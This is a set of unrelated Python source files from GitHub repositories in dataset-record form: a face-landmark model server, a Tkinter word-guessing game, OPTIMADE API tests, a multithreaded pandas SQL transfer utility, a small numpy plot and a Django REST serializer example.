parser = argparse.ArgumentParser()\n parser.add_argument('--host', dest='host', default='0.0.0.0')\n parser.add_argument('--port', dest='port', default=8080, type=int)\n parser.add_argument('--debug', action='store_true', default=False)\n parser.add_argument('--model', dest='model_path', default='code/points_15.py')\n parser.add_argument('--weights', dest='weights_path', default='weights/points_15.pth')\n parser.add_argument('--cert', dest='cert', default=None)\n parser.add_argument('--key', dest='key', default=None)\n parser.add_argument('--models-dir', default=None)\n parser.add_argument('--cascades-dir', default=None)\n args = parser.parse_args()\n\n if args.models_dir is None:\n if 
args.debug:\n args.models_dir = Path.cwd().parent/'models'\n else:\n args.models_dir = Path('/models')\n\n if args.cascades_dir is None:\n if args.debug:\n args.cascade_dir = Path.cwd().parent/'cascades'\n else:\n args.cascade_dir = Path('/cascades')\n\n model_path = args.models_dir/args.model_path\n weights_path = args.models_dir/args.weights_path\n model = create_model(model_path, weights_path)\n cascade = cv.CascadeClassifier(str(args.cascade_dir/'haar_face_frontal.xml'))\n\n app.debug = args.debug\n set_global('model', model)\n set_global('cascade', cascade)\n\n config = dict(app=app, host=args.host, port=args.port)\n if args.cert is not None and args.key is not None:\n # https://github.com/encode/uvicorn/pull/213\n config.update(dict(\n ssl_version=ssl.PROTOCOL_SSLv23,\n cert_reqs=ssl.CERT_OPTIONAL,\n certfile=args.cert,\n keyfile=args.key\n ))\n\n uvicorn.run(**config)\n\n\ndef create_model(model_path, weights_path):\n module_name = model_path.stem\n spec = importlib.util.spec_from_file_location(module_name, model_path)\n module = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(module)\n model = module.model_factory(1, 30)\n model.load(weights_path)\n model.train(False)\n return model\n\n\nif __name__ == '__main__':\n serve()\n","repo_name":"devforfu/face-landmarks-detection","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6148445691","text":"from tkinter import *\nimport string\n\nfrom controller import Termo\nfrom pathResolver import resource_path\n\nclass Game(Frame):\n def __init__(self, parent_container, parent):\n Frame.__init__(self, parent_container)\n self.parent = parent\n self.root = self\n\n # Mainframe\n mainframe = Frame(self.root, width=700, height=850, bg='#6e5c62', padx=120, pady=45)\n mainframe.grid(column=0, row=0, sticky=(N, S, E, W))\n mainframe.columnconfigure(0, weight=1)\n mainframe.rowconfigure(2, weight=1)\n mainframe.grid_propagate(0)\n\n # Título\n self.title_image = PhotoImage(file=resource_path('images/title.png'))\n Label(mainframe, image=self.title_image, bg='#6e5c62').grid(row=0, column=0, sticky=(N, E, W))\n\n # Jogador 1\n score_player1 = Frame(mainframe, bg='#6e5c62')\n score_player1.grid(column=0, row=1, sticky=W, pady='35 0')\n score_player1.columnconfigure(0, weight=1)\n\n self.player1_name = Label(score_player1, font=('Fira Code', 20, 'bold'), bg='#6e5c62', fg=\"#FAFAFF\")\n self.player1_name.grid(row=0, column=0, sticky=W)\n self.player1_score = Label(score_player1, text=\"000\", font=('Fira Code', 15, 'bold'), bg='#6e5c62', fg=\"#FAFAFF\")\n self.player1_score.grid(row=1, column=0, sticky=W)\n\n # Jogador 2\n score_player2 = Frame(mainframe, bg='#6e5c62')\n score_player2.grid(column=0, row=1, sticky=E, pady='35 0')\n score_player2.columnconfigure(0, weight=1)\n\n self.player2_name = Label(score_player2, font=('Fira Code', 20, 'bold'), bg='#6e5c62', fg=\"#FAFAFF\")\n self.player2_name.grid(row=0, column=0, sticky=E)\n self.player2_score = Label(score_player2, text=\"000\", font=('Fira Code', 15, 'bold'), bg='#6e5c62', fg=\"#FAFAFF\")\n self.player2_score.grid(row=1, column=0, sticky=E)\n\n # Warnings\n self.warnings = []\n\n # Palavras devem ter 5 letras\n self.five_letters_warning_image = PhotoImage(file=resource_path('images/five-letters-warning.png'))\n self.warnings.append(Label(mainframe, image=self.five_letters_warning_image, bg='#6e5c62'))\n\n # Palavra não reconhecida\n 
self.invalid_word_warning_image = PhotoImage(file=resource_path('images/invalid-word-warning.png'))\n self.warnings.append(Label(mainframe, image=self.invalid_word_warning_image, bg='#6e5c62'))\n\n # Palavra certa\n self.correct_word_warning_image = PhotoImage(file=resource_path('images/correct-word-warning.png'))\n self.warnings.append(Label(mainframe, image=self.correct_word_warning_image, bg='#6e5c62'))\n\n # Empate\n self.draw_warning_image = PhotoImage(file=resource_path('images/draw-warning.png'))\n self.warnings.append(Label(mainframe, image=self.draw_warning_image, bg='#6e5c62'))\n\n # Tabuleiro\n self.initBoardImages()\n\n board_frame = Frame(mainframe, bg='#6e5c62')\n board_frame.grid(column=0, row=2, sticky=N, pady='65 0')\n self.board = [[0] * 5 for _ in range(6)]\n self.board_value = [[''] * 5 for _ in range(6)]\n for row in range(6):\n for column in range(5):\n self.board[row][column] = Label(board_frame, image=self.empty[''], bg='#6e5c62', fg=\"white\")\n self.board[row][column].grid(row=row, column=column)\n\n self.end_message_word = Label(\n mainframe, \n text='A palavra correta era \"\"', \n font=('Fira Code', 16, 'bold'), \n bg='#6e5c62', \n fg=\"#FAFAFF\"\n )\n\n self.end_message = Label(\n mainframe, \n text='Pressione qualquer tecla para jogar novamente.', \n font=('Fira Code', 12, 'bold'), \n bg='#6e5c62', \n fg=\"#FAFAFF\"\n )\n\n for child in mainframe.winfo_children(): \n child.grid_configure(padx=10)\n\n def open(self, player1_name, player2_name):\n self.parent.title(\"Termo - Game\")\n self.parent.geometry('700x850')\n self.parent.resizable(width=False, height=False)\n self.parent.columnconfigure(0, weight=1)\n self.parent.rowconfigure(0, weight=1)\n\n self.player1_name.config(text=player1_name.upper())\n self.player2_name.config(text=player2_name.upper())\n\n self.controller = Termo(player1_name, player2_name, self)\n self.controller.novaPartida()\n\n self.resetBoard()\n\n def initBoardImages(self):\n self.empty = {\n '': PhotoImage(file=resource_path('images/empty-tile/empty-tile.png')), \n 'selected-row': PhotoImage(file=resource_path('images/empty-tile/empty-tile-selected-row.png')),\n 'selected-tile': PhotoImage(file=resource_path('images/empty-tile/empty-tile-selected-tile.png')),\n }\n self.right = dict()\n self.semi_correct = dict()\n self.wrong = dict()\n\n for letter in string.ascii_lowercase:\n self.empty[letter] = PhotoImage(file=resource_path(f'images/empty-tile/empty-tile-{letter}.png'))\n\n for letter in string.ascii_lowercase + 'áéíóúâêôãõç':\n self.right[letter] = PhotoImage(file=resource_path(f'images/right-tile/right-tile-{letter}.png'))\n self.semi_correct[letter] = PhotoImage(file=resource_path(f'images/semi-correct-tile/semi-correct-{letter}.png'))\n self.wrong[letter] = PhotoImage(file=resource_path(f'images/wrong-tile/wrong-tile-{letter}.png'))\n\n def refreshScore(self, scorePlayer1, scorePlayer2):\n self.player1_score.config(text=f'{scorePlayer1:03d}')\n self.player2_score.config(text=f'{scorePlayer2:03d}')\n\n def setCurPlayer(self, player):\n self.player1_name.config(fg='#FAFAFF')\n self.player2_name.config(fg='#FAFAFF')\n self.player1_score.config(fg='#FAFAFF')\n self.player2_score.config(fg='#FAFAFF')\n \n if player == 0:\n self.player1_name.config(fg='#D3AD69')\n self.player1_score.config(fg='#D3AD69')\n else: \n self.player2_name.config(fg='#D3AD69')\n self.player2_score.config(fg='#D3AD69')\n\n def showNotification(self, code, autoFade=True):\n self.warnings[code].place(relx=0.5, y=210, anchor=CENTER)\n if autoFade:\n 
self.warnings[code].after(1500, lambda: self.warnings[code].place_forget())\n \n def notifyWinner(self, player, word, rightWord=True):\n self.showNotification(3 if player == 2 else 2, False)\n\n self.player1_name.config(fg='#FAFAFF')\n self.player1_score.config(fg='#FAFAFF')\n self.player2_name.config(fg='#FAFAFF')\n self.player2_score.config(fg='#FAFAFF')\n\n if player == 0 or player == 2:\n self.player1_name.config(fg='#3AA394')\n self.player1_score.config(fg='#3AA394')\n \n if player == 1 or player == 2: \n self.player2_name.config(fg='#3AA394')\n self.player2_score.config(fg='#3AA394')\n\n if rightWord:\n self.player1_score.config(text='---')\n self.player2_score.config(text='---')\n\n if self.cur_row < 6:\n [tile.config(image=self.empty['']) for tile in self.board[self.cur_row]]\n \n self.unbind('')\n self.bind('', self.resetGame)\n\n self.end_message_word.config(text=f'A palavra correta era \"{word.upper()}\"')\n self.end_message_word.place(relx=0.5, rely=0.95, anchor=CENTER)\n self.end_message.place(relx=0.5, rely=1, anchor=CENTER)\n\n def resetGame(self, keyPress):\n self.resetBoard()\n self.controller.novaPartida()\n\n def takeInput(self, keyPress):\n if keyPress.char.lower() in list(string.ascii_lowercase) and self.cur_column < 5:\n self.board[self.cur_row][self.cur_column].config(image=self.empty[keyPress.char.lower()])\n self.board_value[self.cur_row][self.cur_column] = keyPress.char.lower()\n\n self.cur_column += 1\n\n if self.cur_column < 5:\n self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-tile'])\n elif keyPress.char == '\\x08':\n if self.cur_column < 5:\n self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-row'])\n\n self.cur_column = max(0, self.cur_column - 1)\n\n self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-tile'])\n self.board_value[self.cur_row][self.cur_column] = ''\n elif keyPress.keysym == 'Return':\n if self.cur_column != 5:\n self.showNotification(0)\n else:\n self.controller.verifyEntry(''.join(self.board_value[self.cur_row]))\n else:\n pass\n\n def resetBoard(self):\n [warning.grid_forget() for warning in self.warnings]\n [warning.place_forget() for warning in self.warnings]\n self.end_message.grid_forget()\n self.end_message_word.grid_forget()\n self.end_message.place_forget()\n self.end_message_word.place_forget()\n\n self.focus_set()\n self.unbind('')\n self.bind('', self.takeInput)\n\n self.cur_row = 0\n self.cur_column = 0\n\n for row in range(6):\n for column in range(5):\n self.board[row][column].config(image=self.empty[''])\n self.board_value[row][column] = ''\n\n [tile.config(image=self.empty['selected-row']) for tile in self.board[self.cur_row]]\n self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-tile'])\n\n def refreshBoard(self, hit_list, word):\n for i in range(len(hit_list)):\n if hit_list[i] == 10:\n self.board[self.cur_row][i].config(image=self.right[word[i]])\n elif hit_list[i] == 5:\n self.board[self.cur_row][i].config(image=self.semi_correct[word[i]])\n else:\n self.board[self.cur_row][i].config(image=self.wrong[word[i]])\n \n self.cur_row += 1\n self.cur_column = 0\n\n if self.cur_row < 6:\n [tile.config(image=self.empty['selected-row']) for tile in self.board[self.cur_row]]\n 
self.board[self.cur_row][self.cur_column].config(image=self.empty['selected-tile'])","repo_name":"Bredstone/Clone-Jogo-Termo","sub_path":"src/viewJogo.py","file_name":"viewJogo.py","file_ext":"py","file_size_in_byte":9401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"1008447357","text":"from optimade.models import (\n StructureResponseMany,\n StructureResponseOne,\n ReferenceResource,\n)\n\nfrom ..utils import RegularEndpointTests\n\n\nclass TestStructuresEndpoint(RegularEndpointTests):\n \"\"\"Tests for /structures\"\"\"\n\n request_str = \"/structures\"\n response_cls = StructureResponseMany\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n assert \"meta\" in self.json_response\n assert self.json_response[\"meta\"][\"data_available\"] == 17\n assert not self.json_response[\"meta\"][\"more_data_available\"]\n assert \"data\" in self.json_response\n assert (\n len(self.json_response[\"data\"])\n == self.json_response[\"meta\"][\"data_available\"]\n )\n\n def test_get_next_responses(self, get_good_response):\n \"\"\"Check pagination\"\"\"\n total_data = self.json_response[\"meta\"][\"data_available\"]\n page_limit = 5\n\n json_response = get_good_response(\n self.request_str + f\"?page_limit={page_limit}\"\n )\n\n cursor = json_response[\"data\"].copy()\n assert json_response[\"meta\"][\"more_data_available\"]\n more_data_available = True\n next_request = json_response[\"links\"][\"next\"]\n\n while more_data_available:\n next_response = get_good_response(next_request)\n next_request = next_response[\"links\"][\"next\"]\n cursor.extend(next_response[\"data\"])\n more_data_available = next_response[\"meta\"][\"more_data_available\"]\n if more_data_available:\n assert len(next_response[\"data\"]) == page_limit\n else:\n assert len(next_response[\"data\"]) == total_data % page_limit\n\n assert len(cursor) == total_data\n\n\nclass TestSingleStructureEndpoint(RegularEndpointTests):\n \"\"\"Tests for /structures/\"\"\"\n\n test_id = \"mpf_1\"\n request_str = f\"/structures/{test_id}\"\n response_cls = StructureResponseOne\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n assert \"data\" in self.json_response\n assert self.json_response[\"data\"][\"id\"] == self.test_id\n assert self.json_response[\"data\"][\"type\"] == \"structures\"\n assert \"attributes\" in self.json_response[\"data\"]\n assert \"_exmpl_chemsys\" in self.json_response[\"data\"][\"attributes\"]\n\n\nclass TestMissingSingleStructureEndpoint(RegularEndpointTests):\n \"\"\"Tests for /structures/ for unknown \"\"\"\n\n test_id = \"mpf_random_string_that_is_not_in_test_data\"\n request_str = f\"/structures/{test_id}\"\n response_cls = StructureResponseOne\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n assert \"data\" in self.json_response\n assert \"meta\" in self.json_response\n assert self.json_response[\"data\"] is None\n assert self.json_response[\"meta\"][\"data_returned\"] == 0\n assert not self.json_response[\"meta\"][\"more_data_available\"]\n\n\nclass TestSingleStructureWithRelationships(RegularEndpointTests):\n \"\"\"Tests for /structures/, where has relationships\"\"\"\n\n test_id = \"mpf_1\"\n request_str = f\"/structures/{test_id}\"\n response_cls = StructureResponseOne\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known 
properties/attributes for successful response\"\"\"\n assert \"data\" in self.json_response\n assert self.json_response[\"data\"][\"id\"] == self.test_id\n assert self.json_response[\"data\"][\"type\"] == \"structures\"\n assert \"attributes\" in self.json_response[\"data\"]\n assert \"relationships\" in self.json_response[\"data\"]\n assert self.json_response[\"data\"][\"relationships\"] == {\n \"references\": {\"data\": [{\"type\": \"references\", \"id\": \"dijkstra1968\"}]}\n }\n assert \"included\" in self.json_response\n assert len(\n self.json_response[\"data\"][\"relationships\"][\"references\"][\"data\"]\n ) == len(self.json_response[\"included\"])\n\n ReferenceResource(**self.json_response[\"included\"][0])\n\n\nclass TestMultiStructureWithSharedRelationships(RegularEndpointTests):\n \"\"\"Tests for /structures for entries with shared relationships\"\"\"\n\n request_str = \"/structures?filter=id=mpf_1 OR id=mpf_2\"\n response_cls = StructureResponseMany\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n # mpf_1 and mpf_2 both contain the same reference relationship, so response should not duplicate it\n assert \"data\" in self.json_response\n assert len(self.json_response[\"data\"]) == 2\n assert \"included\" in self.json_response\n assert len(self.json_response[\"included\"]) == 1\n\n\nclass TestMultiStructureWithRelationships(RegularEndpointTests):\n \"\"\"Tests for /structures for mixed entries with and without relationships\"\"\"\n\n request_str = \"/structures?filter=id=mpf_1 OR id=mpf_23\"\n response_cls = StructureResponseMany\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n # mpf_23 contains no relationships, which shouldn't break anything\n assert \"data\" in self.json_response\n assert len(self.json_response[\"data\"]) == 2\n assert \"included\" in self.json_response\n assert len(self.json_response[\"included\"]) == 1\n\n\nclass TestMultiStructureWithOverlappingRelationships(RegularEndpointTests):\n \"\"\"Tests for /structures with entries with overlapping relationships\n\n One entry has multiple relationships, another entry has other relationships,\n some of these relationships overlap between the entries, others don't.\n \"\"\"\n\n request_str = \"/structures?filter=id=mpf_1 OR id=mpf_3\"\n response_cls = StructureResponseMany\n\n def test_structures_endpoint_data(self):\n \"\"\"Check known properties/attributes for successful response\"\"\"\n assert \"data\" in self.json_response\n assert len(self.json_response[\"data\"]) == 2\n assert \"included\" in self.json_response\n assert len(self.json_response[\"included\"]) == 2\n","repo_name":"attlevafritt/tfya92-groupa-optimade-python-tools","sub_path":"optimade-python-tools/tests/server/routers/test_structures.py","file_name":"test_structures.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38426498132","text":"import os\nimport uuid\nimport re\nimport sys\nimport threading\nimport shutil\nimport pandas as pd\nfrom tqdm import tqdm\nfrom queue import Queue\nfrom fast_sql.utils.exception import DB_Exceptions\nfrom concurrent.futures import ThreadPoolExecutor\nfrom fast_sql.utils.common import DB_Pool, collection_error,Sqlalchemy_Pool\n\n\nclass Read_sql:\n\n def __init__(\n self,\n sql,\n con=None,\n thread_num=None,\n encoding='utf8',\n show_progress=False,\n chunksize=15000,\n 
desc=None\n ):\n if con is not None:\n self.db_pool = Sqlalchemy_Pool(con, num=thread_num + 6, encoding=encoding)\n self.driver = self.db_pool.driver\n self.sql = sql.strip().replace('\\n', ' ')\n self.thread_num = thread_num\n self.avg_list = None\n self.result = []\n self.pd_params = None\n self.lock = threading.Lock()\n self.ordering = None\n self.show_progress = show_progress\n self.progress = None\n self.queue = Queue()\n self.count = None\n self.tqdm = None\n self.chunksize = chunksize\n self.tqdm_w = None\n self.desc = desc\n\n def read_sql(self, **kwargs):\n con = self.db_pool.get_db()\n self.pd_params = kwargs\n self.avg_list = self.verify_sql()\n self.tqdm_init(self.count, weight=85)\n if self.avg_list is None:\n result = pd.read_sql(self.sql, con, **self.pd_params)\n result.columns = [i.upper() for i in result.columns.tolist()]\n self.tqdm_update(self.count)\n else:\n task_list,pool = self.start_thread_read()\n self.get_thread_result(task_list)\n result = self.result.pop(0)\n for i in range(len(self.result)):\n result = result.append(self.result.pop(0), ignore_index=True)\n\n result.columns = [i.upper() for i in result.columns.tolist()]\n\n if self.driver == 'oracle':\n result.drop('NO', axis=1, inplace=True)\n\n if self.ordering:\n result.sort_values([i.strip().upper()\n for i in self.ordering], inplace=True)\n self.db_pool.close_db(con)\n self.result.clear()\n return result\n\n def tqdm_update(self, count=None,mode=None):\n tqdm = self.tqdm if mode is None else self.tqdm_w\n if self.show_progress:\n if count:\n tqdm.update(count)\n\n elif tqdm.n + self.chunksize < self.count:\n tqdm.update(self.chunksize)\n\n else:\n tqdm.update(self.count - tqdm.n)\n\n def tqdm_init(self, count,weight,mode=None):\n if self.show_progress:\n if mode is None:\n self.tqdm = tqdm(total=count, desc=self.desc, ncols=weight)\n else:\n self.tqdm_w = tqdm(total=count, desc=self.desc, ncols=weight)\n\n @collection_error\n def get_sql_query(self, st, en, *args, **kwargs):\n if self.driver == 'oracle':\n sql_1 = f'''\n select * from (select rownum no,d.* from (\n {self.sql}\n ) d where rownum<{en}) where no>={st}\n '''\n else:\n sql_1 = f'''\n select * from ({self.sql}) as t limit {st}{','+str(en)}\n '''\n con = self.db_pool.get_db()\n query = pd.read_sql(sql_1, con, **self.pd_params)\n self.save_query(query)\n self.db_pool.close_db(con)\n del query\n\n def save_query(self, df_value):\n self.lock.acquire()\n self.result.append(df_value)\n self.tqdm_update()\n self.lock.release()\n\n def start_thread_read(self,):\n pool = ThreadPoolExecutor(max_workers=self.thread_num)\n task_list = [pool.submit(self.get_sql_query, st, en)\n for st, en in self.avg_list]\n return task_list,pool\n\n def verify_sql(self):\n con = self.db_pool.get_db()\n self.count = self.get_query_count(con, self.sql)\n # self.chunksize = self.count // self.thread_num // 2\n # self.tqdm_init(self.count, desc='Read the scheduler', weight=85)\n\n if 'order' in self.sql.lower():\n buf = self.sql.split('order')\n self.ordering = buf[1].split('by')[1].strip().split(',')\n self.sql = buf[0]\n\n if self.count < 2000:\n return None\n\n if self.driver == 'oracle':\n avg_list = [\n (i,\n i +\n self.chunksize) for i in range(\n 1,\n self.count +\n self.chunksize +\n 1,\n self.chunksize)]\n\n else:\n avg_list = [(self.chunksize * i, self.chunksize)\n for i in range(0, self.count // self.chunksize + 1)]\n\n self.db_pool.close_db(con)\n return avg_list\n\n def get_query_count(self, con, sql):\n # _sql = \"select count(*) \" + re.search(r\"from\\s+.*\", 
sql, re.I).group()\n _sql = f\"select count(*) from ({sql}) t\"\n count = pd.read_sql(_sql, con, **self.pd_params).iloc[0, 0]\n # assert count > 0, DB_Exceptions('DB_EMPTY:')\n return count\n\n def get_thread_result(self,task_list):\n for job in task_list:\n job.result()\n\n def __del__(self):\n if self.show_progress:\n if self.tqdm is not None:\n self.tqdm.update(self.count - self.tqdm.n)\n sys.stdout.flush()\n\n\nclass to_csv(Read_sql):\n\n def __init__(self, *args, path_or_buf=None, **kwargs):\n super(to_csv, self).__init__(*args, **kwargs)\n self.path = path_or_buf\n self.args = None\n self.kwargs = None\n\n def write_csv_header(self):\n if self.driver == 'oracle':\n sql_1 = f'''\n select * from (select rownum no,d.* from (\n {self.sql}\n ) d where rownum<{2}) where no>={1}\n '''\n else:\n sql_1 = f'''\n select * from ({self.sql}) as t limit 1\n '''\n return sql_1\n\n def build_csv(self, *args, **kwargs):\n con = self.db_pool.get_db()\n self.args = args\n self.kwargs = kwargs\n self.kwargs.pop('mode')\n self.kwargs.pop('chunksize')\n self.pd_params = {'columns': None}\n self.avg_list = self.verify_sql()\n self.tqdm_init(self.count, weight=85)\n if self.avg_list is None:\n pd.read_sql(self.sql, con).to_csv(*args, **kwargs)\n self.tqdm_update(self.count)\n else:\n df = pd.read_sql(self.write_csv_header(),con)\n # df = next(pd.read_sql(self.sql, con, chunksize=1)).iloc[1:, ]\n df.to_csv(*args, **kwargs)\n task_list,pool = self.start_thread_read()\n self.db_pool.close_db(con)\n self.get_thread_result(task_list)\n\n self.db_pool.close_db(con)\n return 'finish'\n\n def save_query(self, df_value):\n self.lock.acquire()\n if self.driver == 'oracle':\n df_value.drop(df_value.columns[0], axis=1, inplace=True)\n\n # if self.ordering:\n # df_value.columns = [i.lower() for i in df_value.columns.tolist()]\n # df_value.sort_values([i.strip() for i in self.ordering], inplace=True)\n self.kwargs.update(header=None)\n df_value.ToCsv(*self.args, mode='a', **self.kwargs, )\n self.tqdm_update()\n self.lock.release()\n\n\nclass to_sql(Read_sql):\n\n def __init__(self, *args, **kwargs):\n to_db = kwargs.pop('to_db')\n kwargs.update(con=kwargs.pop('from_db'))\n self.to_table = kwargs.pop('to_table')\n self.to_columns = kwargs.pop('to_columns')\n self.if_exists = kwargs.pop('if_exists')\n self.mode = kwargs.pop('mode').lower()\n self.file_path = kwargs.pop('file_path')\n self.delete_cache = kwargs.pop('delete_cache')\n self.save_path = kwargs.pop('save_path',None)\n self.thread_w = kwargs.pop('thread_w',3)\n self.delete_sql= kwargs.pop('delete_sql',None)\n self.dir_path = None\n self.task_count = None\n self.execute_count = 0\n self.data_processing = kwargs.pop('data_processing',None)\n super().__init__(*args, **kwargs)\n if to_db is not None:\n self.to_db = DB_Pool(to_db, num=8, encoding=kwargs.get('encoding'))\n self.write_driver = self.to_db.driver\n self.lock_b = threading.Lock()\n self.execute_pool = None\n\n def delete_table(self):\n sql = self.sql.replace(\n re.search(\n r'from\\s+(\\S+)',\n self.sql).group(1),\n self.to_table)\n sql = re.sub('(order|ORDER)\\s+(by|BY).*','',sql)\n sql = 'delete ' + re.search('from.*', sql, re.I).group()\n con = self.to_db.get_db()\n db = con.cursor()\n if self.delete_sql is not None:\n sql = self.delete_sql\n db.execute(sql)\n con.commit()\n self.to_db.close_db(con)\n\n\n def decision(self):\n if self.save_path is None:\n self.dir_path = os.path.join(os.getcwd(),f'{uuid.uuid1()}){self.to_table}')\n os.mkdir(self.dir_path)\n else:\n self.dir_path = self.save_path\n 
self.file_path = self.dir_path\n\n if self.avg_list is None:\n con = self.db_pool.get_db()\n df = pd.read_sql(self.sql, con, **self.pd_params)\n file_path = os.path.join(self.dir_path, f'{uuid.uuid1()}.pkl')\n df.to_pickle(file_path)\n if self.mode in ('wr', 'rw'):\n self.task_count = 1\n self.tqdm_init(self.task_count, weight=85, mode=True)\n self.queue.put(file_path)\n self.write_db()\n else:\n self.tqdm_update(count=self.task_count)\n\n self.db_pool.close_db(con)\n\n else:\n task_list,pool = self.start_thread_read()\n self.task_count = len(self.avg_list)\n if self.mode in ('wr', 'rw'):\n self.tqdm_init(self.task_count, weight=85, mode=True)\n _pool = ThreadPoolExecutor(max_workers=self.thread_w)\n p = [pool.submit(self.write_db) for i in range(5)]\n self.get_thread_result(p)\n self.get_thread_result(task_list)\n\n def rsync_db(self, *args, **kwargs):\n\n self.pd_params = kwargs\n\n self.sql = self.sql.strip().replace('\\n', ' ')\n\n if self.to_table is None:\n self.to_table = re.search(r'from\\s+(\\S+)', self.sql, re.I).group(1)\n\n if self.if_exists == 'delete' and self.mode !='r':\n self.delete_table()\n\n if self.mode == 'w':\n return self.write()\n\n self.avg_list = self.verify_sql()\n self.tqdm_init(self.count, weight=85)\n\n self.decision()\n\n return 'finish'\n\n def write(self):\n file_list = [\n os.path.join(\n self.file_path,\n i) for i in os.listdir(\n self.file_path)]\n self.task_count = len(file_list)\n self.tqdm_w = tqdm(\n total=self.task_count,\n desc=self.desc,\n ncols=80)\n T = ThreadPoolExecutor(max_workers=self.thread_w)\n put_list = [self.queue.put(path) for path in file_list]\n task_list = [T.submit(self.write_db) for i in put_list]\n T.shutdown(wait=True)\n return 'finish'\n\n def save_query(self, df_value):\n file_path = os.path.join(self.dir_path, f'{uuid.uuid1()}.pkl')\n if self.driver == 'oracle':\n df_value.drop(df_value.columns[0], axis=1, inplace=True)\n df_value.to_pickle(file_path)\n self.queue.put(file_path)\n self.tqdm_update()\n\n def get_sys_guid_col(self, columns, con):\n col_type = pd.read_sql(\n f\"select a.COLUMN_NAME,a.DATA_TYPE,a.DATA_SCALE,a.DATA_DEFAULT from all_tab_cols a where TABLE_NAME='{self.to_table.upper()}'\",\n con)\n sys_guid = col_type.loc[col_type['DATA_DEFAULT']\n == ' SYS_GUID() ', 'COLUMN_NAME']\n if not sys_guid.empty:\n columns.remove(sys_guid.values[0])\n return columns\n else:\n return columns\n\n def get_sql(self, columns,):\n insert_col = ','.join(columns)\n # con = self.to_db.get_db()\n if self.write_driver == 'oracle':\n # columns = self.get_sys_guid_col(columns, con)\n sql_col = ':' + ',:'.join([str(i)\n for i in range(1, len(columns) + 1)])\n sql = f'insert into {self.to_table}({insert_col}) values({sql_col})'\n return sql\n\n elif self.write_driver == 'mysql':\n sql_col = '%' + ',%'.join('s' * len(columns))\n insert_col = ','.join([f\"`{i}`\" for i in columns])\n sql = f\"insert into {self.to_table}({insert_col}) values({sql_col})\"\n return sql\n\n @collection_error\n def write_db(self):\n while True:\n self.lock_b.acquire()\n if self.execute_count < self.task_count:\n # df = pd.read_pickle(file_path)\n self.execute_count += 1\n self.lock_b.release()\n path = self.queue.get()\n self.insert_db(path)\n else:\n # self.tqdm_w.update(self.task_count - self.tqdm_w.n)\n self.lock_b.release()\n break\n\n\n def insert_db(self,path):\n df = pd.read_pickle(path)\n df.columns = [i.upper() for i in df.columns]\n if self.data_processing is not None:\n df = self.data_processing(df)\n\n c = [(column, str(date)) for column, date in 
zip(df.columns.tolist(), df.dtypes) if 'date' in str(date)]\n if self.write_driver == 'mysql':\n for column, date in c:\n df[column] = df[column].astype('str')\n df.replace('NaT', None, inplace=True)\n else:\n for column, date in c:\n df[column] = df[column].astype('object')\n\n df = df.mask(df.isna(), None)\n\n con = self.to_db.get_db()\n db = con.cursor()\n\n if self.to_columns is not None:\n df = df[self.to_columns]\n\n columns = df.columns.tolist()\n sql = self.get_sql(columns)\n\n try:\n db.executemany(sql, df.values.tolist())\n except Exception as e:\n con.rollback()\n raise e\n else:\n con.commit()\n self.tqdm_update(count=1, mode=True)\n finally:\n del df\n db.close()\n con.close()\n\n def __del__(self):\n\n if self.delete_cache:\n if self.mode in ('wr', 'rw') and self.save_path is None:\n shutil.rmtree(self.file_path)\n if self.show_progress:\n if self.tqdm is not None:\n self.tqdm.update(self.count - self.tqdm.n)\n if self.tqdm_w is not None:\n self.tqdm_w.update(self.task_count - self.tqdm_w.n)\n sys.stdout.flush()\n","repo_name":"tosmart01/fastsql","sub_path":"build/lib/fast_sql/fastsql/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":15125,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"54"} +{"seq_id":"25883700568","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nx=10\r\nprint(pow(x,2),\" - \",pow(x,3))\r\ntheta=np.pi\r\nprint(\"Sin : \" ,np.sin(theta),\" Cos : \",np.cos(theta)) #Radians\r\nmeshpoints=np.linspace(-1,1,500)\r\nprint(meshpoints[52]) #-0.7915831663326653\r\nplt.plot(meshpoints,np.sin(2*np.pi*meshpoints))\r\nplt.show()","repo_name":"ZahraJms/Python-Summer-Class","sub_path":"Ex10 -1 _ Zahra Jamshidi.py","file_name":"Ex10 -1 _ Zahra Jamshidi.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43410691464","text":"from rest_framework import serializers\n\nimport datetime\n# from corebookmodels.api.serializers import Book, BookSerializers\n\nclass Book:\n def __init__(self, title, year, author):\n self.title = title\n self.year = year\n self.author = author\n\n def __str__(self):\n return f'{self.title} {self.year}'\n\n\nb = Book(title='Kafka on the shore', year=datetime.datetime.now(), author='Murakami')\n\n\ndef checkyear(value):\n get_year = value.year\n if get_year >= 2020:\n raise serializers.ValidationError('YEar must not exceed 2020')\n\n\nclass BookSerializers(serializers.Serializer):\n title = serializers.CharField(max_length=300)\n\n author = serializers.CharField(max_length=300)\n\n year = serializers.DateTimeField(validators=[checkyear])\n\n # def create(self, validated_data):\n # print('created')\n # return Book(**validated_data)\n #\n # def update(self, instance, validated_data):\n # instance.title = validated_data.get('title', instance.title)\n # instance.year = validated_data.get('year', instance.year)\n # instance.author = validated_data.get('author', instance.author)\n # print('updated')\n # return instance\n\n def validate_title(self, value):\n if 'Haruki' not in value.lower():\n raise serializers.ValidationError('Must contain haruki')\n return 